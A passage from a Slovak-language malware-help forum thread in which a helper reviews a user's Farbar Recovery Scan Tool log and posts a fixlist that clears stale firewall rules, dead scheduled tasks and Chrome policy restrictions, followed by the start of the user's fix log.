FirewallRules: [{769336BD-9379-4490-8F9F-E9FA1CC2DCAB}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [TCP Query User{58028633-BF2A-440C-A580-BF4C8A4AA820}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{2A70850E-96CF-47FB-9C90-E3E834183FC8}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [{DF3AB8C6-D5A5-4D24-B8B9-3638A08EC446}] => (Allow) D:\Programy\Davinci\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{90E1D846-5A9C-4EC5-A6B7-586E01CFF434}] => (Allow) D:\Programy\Davinci\bmdpaneld.exe () [File not signed]
FirewallRules: [{D761FCC8-0F10-4D82-BE98-4050364F04A5}] => (Allow) D:\Programy\Davinci\DaVinciPanelDaemon.exe () [File not signed]
FirewallRules: [{76BFF8C8-BF48-47CB-ABA4-B5E82F0092F1}] => (Allow) D:\Programy\Davinci\JLCooperPanelDaemon.exe () [File not signed]
FirewallRules: [{3B3E0F92-9C5A-4438-BE0E-F5270535AE28}] => (Allow) D:\Programy\Davinci\EuphonixPanelDaemon.exe () [File not signed]
FirewallRules: [{6EFDD34F-0329-4EFC-95E8-FC81B0AC31E6}] => (Allow) D:\Programy\Davinci\TangentPanelDaemon.exe () [File not signed]
FirewallRules: [{6E00C352-B8B4-4A2F-8CDF-D1F3527383C5}] => (Allow) D:\Programy\Davinci\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [TCP Query User{455134ED-7753-4DAA-9476-D27AC787F88F}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D44AE864-5838-42D9-83BA-8489DF255FC8}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{9219AFA1-328C-4A5F-940B-2B4CEDB13268}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9593C68A-1FB3-401D-B3D1-94DE01DC259D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{AC130793-2F89-41A6-8F71-BD60903E5296}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{278E464D-115C-4F75-8C47-85993E13BF84}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{FFC2B8AE-1939-4CCB-BEBF-9F490C9824FD}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [{9ED468EA-581E-4246-B93F-5916686EA2D8}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{C739BBFF-E446-45DB-944D-7B4F5076D9A2}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [UDP Query User{A8866385-5792-4382-BC8A-D85DF28E84FE}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [TCP Query User{7DD8787E-C39E-492D-B408-1EBE71BA1033}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [UDP Query User{19498341-E34B-4AD7-8763-750721C1E717}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{40725FB9-3F90-459F-AFCB-8F49624A8371}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [UDP Query User{B96FE167-8E44-4F35-8659-15B21539D00D}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [{B6609402-D440-46AB-A838-3492539975C8}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{973AD33C-750E-4AEF-9E33-45E7C1B41823}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{253B106F-1C56-48CB-B28D-46DB43BEB0D9}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{6D8B4E9E-398F-4BE6-8191-6236039CD875}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [{2A4160D9-8A8D-4D49-8EC2-5799EEC41DFE}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [TCP Query User{B0830E4B-499A-46AD-B5EB-4630A4AE2BBF}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [UDP Query User{43CBB4F4-2E71-41CE-B0CA-F8EAE8F74F09}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [TCP Query User{816B0942-C37F-4F80-BEA2-7E3C90414862}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [UDP Query User{D031D023-83AB-49B8-8086-1452092B4A60}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [TCP Query User{7CB2C87F-404A-41EF-9381-B51BD7A9AD61}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [UDP Query User{B0E49713-2170-4625-8CE7-1947CF2445D5}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [TCP Query User{9A5A2BD0-35C2-4DDF-A5C6-E6DBC6D64655}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [UDP Query User{149E8202-B5BE-4B0F-BF46-CC86E6625851}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{CDCDCA1D-A959-4A82-A5F8-0C2C67C2C231}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1BD88D15-D993-4345-BF4F-535DEE0A908E}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A925788E-9D19-4369-88A0-D0FA8376AE79}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1F853AED-4107-4F14-BDDF-ED58CB05BDC3}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{06D1F245-05F2-409F-A4BE-9837E07CD260}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{2569DC12-C2E2-4F91-88CA-7632295A63DE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{1A2359B7-F628-4318-A8B1-6AD77A67BCAA}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{4D399D8C-48FA-4BA2-8612-E595A8C33A6E}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{984671D7-51AF-4F30-BF3B-8DE783B344B9}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [UDP Query User{4544E668-7F0F-4E2B-A3E8-5825E1798ABB}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [{406231D4-1E8F-4951-A3F0-C9DE3789D466}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

09-10-2020 19:32:10 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649
13-10-2020 20:26:05 Windows Update
22-10-2020 20:30:31 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/24/2020 08:00:25 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/24/2020 07:59:42 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=1

Error: (10/24/2020 07:56:51 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/24/2020 07:56:08 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=1

Error: (10/24/2020 07:49:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.10.209.0, time stamp: 0x582a94a1
Faulting module name: mpengine.dll, version: 1.1.17500.4, time stamp: 0x5f6bea05
Exception code: 0xc0000005
Fault offset: 0x000000000006e064
Faulting process ID: 0x95c
Faulting application start time: 0x01d6a954bc131bea
Faulting application path: C:\Program Files\Windows Defender\MsMpEng.exe
Faulting module path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{22431825-0989-4B85-B852-40A0E1A7F7A8}\mpengine.dll
Report ID: 3ff2b52a-1621-11eb-84af-74d43582b677
Faulting package full name:
Faulting package-relative application ID:

Error: (10/24/2020 07:47:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: odriveapp.exe, version: 0.0.0.0, time stamp: 0x514e2c2e
Faulting module name: python27.dll, version: 2.7.18150.1013, time stamp: 0x5e9da178
Exception code: 0xc0000005
Fault offset: 0x000b7077
Faulting process ID: 0x33c4
Faulting application start time: 0x01d6a9f090166a8f
Faulting application path: C:\Users\Tomika\.odrive\bin\6729\odriveapp.exe
Faulting module path: C:\Users\Tomika\ODRIVE~1\bin\6729\python27.dll
Report ID: 085412d8-1621-11eb-84af-74d43582b677
Faulting package full name:
Faulting package-relative application ID:

Error: (10/24/2020 07:47:09 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/24/2020 12:51:51 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable


System errors:
=============
Error: (10/24/2020 08:00:04 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:59:42 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:59:21 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:59:21 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:58:59 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:58:56 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:58:56 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.

Error: (10/24/2020 07:58:56 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "TOM :0" could not be registered on the interface with IP address 192.168.81.99.
The computer with the IP address 192.168.81.97 did not allow the name to be claimed by
this computer.


Windows Defender:
===================================
Date: 2020-10-18 17:42:29.074
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4FFA7FDF-9D80-4665-BA2E-77A22296DD1B}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-17 23:07:35.332
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {F5CF0A25-3F7F-4DFE-A2B7-CD922B8270D3}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-17 20:22:25.412
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {5AC52251-24F3-4360-9AA3-F0699B4C56D5}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-17 15:38:54.119
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {6367FC15-5410-4174-A9C4-4493178CD02C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-16 11:35:52.457
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {D30BD636-C486-4F2F-BB7E-08A596807841}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-24 19:49:23.628
Description:
Windows Defender engine has been terminated due to an unexpected error.
Failure Type: Crash
Exception code: 0xc0000005
Resource: file:C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe

Date: 2020-10-23 14:40:07.043
Description:
Windows Defender has encountered an error trying to upload a suspicious file for further analysis.
Filename: D:\Games\Nexon Launcher\patch\10000\71\718b6816323319a674526cbcd1e779c8661d74fc.download
Sha256:
Current Signature Version: AV: 1.325.1278.0, AS: 1.325.1278.0
Current Engine Version: 1.1.17500.4
Error code: 0x80508016

CodeIntegrity:
===================================

Date: 2020-10-24 12:41:01.721
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-22 20:18:44.800
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-19 17:34:41.461
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-17 20:21:46.429
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-16 11:32:31.824
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-10 11:17:25.481
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-03 11:56:22.058
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-09-25 10:31:30.946
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F6 08/03/2013
Motherboard: Gigabyte Technology Co., Ltd. Z87-HD3
Processor: Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 19%
Total physical RAM: 16271.11 MB
Available physical RAM: 13135.42 MB
Total Virtual: 32655.11 MB
Available Virtual: 28627.06 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.54 GB) (Free:49.31 GB) NTFS
Drive d: (Data) (Fixed) (Total:931.51 GB) (Free:299.06 GB) NTFS

\\?\Volume{eb0d191b-1087-11e6-8250-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92BC3579)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 28A9940F)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Uživatelský avatar
Diallix
Rádce
Rádce
Příspěvky: 2760
Registrován: 27 dub 2008 10:34
Kontaktovat uživatele:

Re: Prosim o preventivnu kontrolu

#6 Příspěvek od Diallix »

Ako je to s legalitou vasho OS??

Do poznamkoveho bloku skopirujte obsah dole:

Kód: Vybrat vše

FirewallRules: [TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [{C0BFCA61-6769-4387-99FB-313A10D98354}] => (Allow) LPort=1542
FirewallRules: [{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}] => (Allow) LPort=1542
FirewallRules: [{1F8EB603-5FF8-4688-8E08-79E2DA138F65}] => (Allow) LPort=53
FirewallRules: [{253B106F-1C56-48CB-B28D-46DB43BEB0D9}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
2016-05-08 17:11 - 2020-08-20 21:11 - 000000034 _____ () C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat
2019-05-26 22:16 - 2019-05-26 22:16 - 000001354 _____ () C:\Users\Tomika\AppData\Roaming\PureRef.ini
2016-07-14 03:15 - 2016-06-25 13:58 - 003760289 _____ (KNIGHT ) C:\Users\Tomika\AppData\Roaming\Setup.exe
2017-03-03 18:32 - 2017-03-03 18:32 - 000000218 _____ () C:\Users\Tomika\AppData\Local\.recently-used.xbel
2018-09-30 20:56 - 2018-09-30 20:56 - 000000000 _____ () C:\Users\Tomika\AppData\Local\oobelibMkey.log
2017-03-03 18:45 - 2017-03-03 18:45 - 000000779 _____ () C:\Users\Tomika\AppData\Local\recently-used.xbel
2017-09-29 20:46 - 2017-09-29 20:46 - 027393556 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp
2017-09-29 20:46 - 2017-09-29 20:46 - 000000000 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp
2017-09-29 20:46 - 2017-09-29 20:48 - 074558506 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp
U4 npcap_wifi; no ImagePath
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [] => [X]

EmptyTemp:
Hosts:

Poznamkovy blok ulozte pod nazvom fixlist.txt do umiestnenia kde je FRST.
Spustite FRST a odkliknite tlacidlo: Fix
Vykona sa funkcionalita po ktorej sa pocitac rebootuje. Po reboote sem vlozte obsah logu: fixlog.txt ulozeneho v umiestneni FRST.
Vyšla moja nová kniha BOTNETY! :173: Informácie o nej nájdete tu: >> BOTNETY <<

¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­
---
Obrázek Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << Obrázek
----
Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
Háveťárna - UPLOAD Malwaru: >> upload <<
---
Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.

Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky

imicro
Návštěvník
Návštěvník
Příspěvky: 83
Registrován: 08 led 2008 16:28

Re: Prosim o preventivnu kontrolu

#7 Příspěvek od imicro »

OS je legala verzia pre pracu na doma od firmy, overuje sa kazdeho pol roka cez VPN.

Fix result of Farbar Recovery Scan Tool (x64) Version: 24-10-2020
Ran by Tomika (26-10-2020 09:01:10) Run:1
Running from C:\Users\Tomika\Desktop
Loaded Profiles: Tomika
Boot Mode: Normal
==============================================

fixlist content:
*****************
FirewallRules: [TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
